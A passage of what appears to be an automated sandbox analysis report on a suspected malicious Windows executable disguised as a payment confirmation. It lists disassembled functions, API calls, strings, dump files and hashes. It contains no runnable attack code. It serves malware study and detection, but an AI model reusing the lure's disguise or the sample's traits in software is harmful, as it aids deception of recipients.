GlobalFree.KERNEL32(00000000), ref: 6E312068
lstrcpyW.KERNEL32(?,?), ref: 6E312222
GetModuleHandleW.KERNEL32(00000008), ref: 6E3122A1
LoadLibraryW.KERNEL32(00000008), ref: 6E3122B2
GetProcAddress.KERNEL32(?,?), ref: 6E31230C
lstrlenW.KERNEL32(00000808), ref: 6E312326

Memory Dump Source

Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true

Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 6c1bc62f1dcadd6ff3ea6132bd61c3f67f25e4e1a32e01df95aa3932b5f24b07
Instruction ID: c9d47fb5e6c88b78a0e51b1a33578622266347f14e1fca2d5fb757c277e7858b
Opcode Fuzzy Hash: 6c1bc62f1dcadd6ff3ea6132bd61c3f67f25e4e1a32e01df95aa3932b5f24b07
Instruction Fuzzy Hash: 9A22CB71D1C60ADECB58CFE9C5806EEB7F8FB1A305F10462ED1A5A3280D7719989DB60

Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Strings

C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet, xrefs: 0040226E

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet
API String ID: 542301482-3948318427
Opcode ID: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
Instruction ID: 6031f0b9305bb7b05064ab4f17c9904609ff1c452577966f293784d012f03e0b
Opcode Fuzzy Hash: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
Instruction Fuzzy Hash: 4A410475A00209AFCB40DFE4C989EAD7BB5BF48308B20457EF505EB2D1DB799982CB54

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
Instruction ID: f0d7266373870d470beff65cac24d35b4a218527411e0b80208e5fb1e93adf0c
Opcode Fuzzy Hash: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
Instruction Fuzzy Hash: 28F08271A04104AED701EBE4ED499AEB378EF14314F60057BE111F31E0D7B84E059B19

Function 0040506E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00405086
GetDlgItem.USER32(?,00000408), ref: 00405091
GlobalAlloc.KERNEL32(00000040,?), ref: 004050DB
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050F2
SetWindowLongW.USER32(?,000000FC,0040567B), ref: 0040510B
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040511F
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405131
SendMessageW.USER32(?,00001109,00000002), ref: 00405147
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405153
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405165
DeleteObject.GDI32(00000000), ref: 00405168
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040519F
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040523A
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040526A

Part of subcall function 00404636: SendMessageW.USER32(00000028,?,?,00404461), ref: 00404644

SendMessageW.USER32(?,00001132,00000000,?), ref: 0040527E
GetWindowLongW.USER32(?,000000F0), ref: 004052AC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052BA
ShowWindow.USER32(?,00000005), ref: 004052CA
SendMessageW.USER32(?,00000419,00000000,?), ref: 004053C5
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040542A
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040543F
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405463
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405483
ImageList_Destroy.COMCTL32(?), ref: 00405498
GlobalFree.KERNEL32(?), ref: 004054A8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405521
SendMessageW.USER32(?,00001102,?,?), ref: 004055CA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055D9
InvalidateRect.USER32(?,00000000,?), ref: 00405604
ShowWindow.USER32(?,00000000), ref: 00405652
GetDlgItem.USER32(?,000003FE), ref: 0040565D
ShowWindow.USER32(00000000), ref: 00405664

Strings

, xrefs: 0040563C
M, xrefs: 00405222
N, xrefs: 00405303

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
Instruction ID: 3eec0fee992af157883e3c32035e614d90e83c27d9cb298499668aae57dc4bf7
Opcode Fuzzy Hash: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
Instruction Fuzzy Hash: B4029D70A00608EFDB20DF64CD45AAF7BB5FB44314F10857AE910BA2E0D7B98A42DF18

Function 00404102 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040413E
ShowWindow.USER32(?), ref: 0040415E
GetWindowLongW.USER32(?,000000F0), ref: 00404170
ShowWindow.USER32(?,00000004), ref: 00404189
DestroyWindow.USER32 ref: 0040419D
SetWindowLongW.USER32(?,00000000,00000000), ref: 004041B6
GetDlgItem.USER32(?,?), ref: 004041D5
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041E9
IsWindowEnabled.USER32(00000000), ref: 004041F0
GetDlgItem.USER32(?,?), ref: 0040429B
GetDlgItem.USER32(?,00000002), ref: 004042A5
SetClassLongW.USER32(?,000000F2,?), ref: 004042BF
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404310
GetDlgItem.USER32(?,00000003), ref: 004043B6
ShowWindow.USER32(00000000,?), ref: 004043D7
EnableWindow.USER32(?,?), ref: 004043E9
EnableWindow.USER32(?,?), ref: 00404404
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040441A
EnableMenuItem.USER32(00000000), ref: 00404421
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404439
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040444C
lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404476
SetWindowTextW.USER32(?,00422F48), ref: 0040448A
ShowWindow.USER32(?,0000000A), ref: 004045BE

Strings

H/B, xrefs: 00404466

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID: H/B
API String ID: 1860320154-184950203
Opcode ID: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
Instruction ID: f8b0abefa6079376cca3afd4ac47b8e6787ccd0873a3a79b8952b84eeba681b3
Opcode Fuzzy Hash: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
Instruction Fuzzy Hash: 91C1CFB1600204BBDB316F61EE85A2B7AB8EB85345F41053EF741B25F0CB795842DB2D

Function 004047C0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 0040485E
GetDlgItem.USER32(?,000003E8), ref: 00404872
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040488F
GetSysColor.USER32(?), ref: 004048A0
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048AE
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048BC
lstrlenW.KERNEL32(?), ref: 004048C1
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048CE
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048E3
GetDlgItem.USER32(?,0000040A), ref: 0040493C
SendMessageW.USER32(00000000), ref: 00404943
GetDlgItem.USER32(?,000003E8), ref: 0040496E
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049B1
LoadCursorW.USER32(00000000,00007F02), ref: 004049BF
SetCursor.USER32(00000000), ref: 004049C2
LoadCursorW.USER32(00000000,00007F00), ref: 004049DB
SetCursor.USER32(00000000), ref: 004049DE
SendMessageW.USER32(00000111,?,00000000), ref: 00404A0D
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A1F

Strings

Call, xrefs: 0040499D
N, xrefs: 0040495C
7G@, xrefs: 004049CA

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: 7G@$Call$N
API String ID: 3103080414-3155595626
Opcode ID: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
Instruction ID: cd0ff63a31a53d86839c1a5ce07a34679cc09665db384d3569e6db54912acae5
Opcode Fuzzy Hash: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
Instruction Fuzzy Hash: 9061B0B1A40209BFDB10AF64CD85EAA7B69FB84305F00843AF605B72D0D779AD51CF98

Function 004062C8 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406463,?,?), ref: 00406303
GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040630C

Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119

GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406329
wsprintfA.USER32 ref: 00406347
GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 00406382
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406391
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063C9
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040641F
GlobalFree.KERNEL32(00000000), ref: 00406430
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406437

Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,80000000,00000003), ref: 00406176
Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198

Strings

mB, xrefs: 00406325
mB, xrefs: 0040631E
eB, xrefs: 004062F1
%ls=%ls, xrefs: 0040633D
[Rename], xrefs: 004063B1, 004063C3

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$eB$mB$mB
API String ID: 2171350718-2529913679
Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
Instruction ID: 393dc7f902851ea198dcc63c4c4a9d42cf85fc1b4335f85fcc59b0ede2066cac
Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
Instruction Fuzzy Hash: 35313571600325BBD2206B29AD49F6B3A6CDF41744F17003AF902F62D3DA7CD82686BC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4

Function 00406930 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
CharNextW.USER32(?,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA

Strings

*?|<>/":, xrefs: 00406982
C:\Users\user\AppData\Local\Temp\, xrefs: 00406931
"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe", xrefs: 00406974

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4151069947
Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
Instruction ID: f71de53da442769783aaa0cb2fea73a85be5ebad64e4744dd58b15c84f46a956
Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
Instruction Fuzzy Hash: 2211C8A580021295DB303B548D40B7766F8AF59790F56403FED96B3AC1E77C4C9282BD

Function 00404668 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404685
GetSysColor.USER32(00000000), ref: 004046C3
SetTextColor.GDI32(?,00000000), ref: 004046CF
SetBkMode.GDI32(?,?), ref: 004046DB
GetSysColor.USER32(?), ref: 004046EE
SetBkColor.GDI32(?,?), ref: 004046FE
DeleteObject.GDI32(?), ref: 00404718
CreateBrushIndirect.GDI32(?), ref: 00404722

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: a82f55cf926b6e885627a74f3bab1bdd796941bf972b84b6a5e459a8b365bc4c
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 5C2177715007449BC7309F78DD48B577BF4AF42715B04893DEA96A36E0D738E944CB58

Function 00405707 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

Memory Dump Source

Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
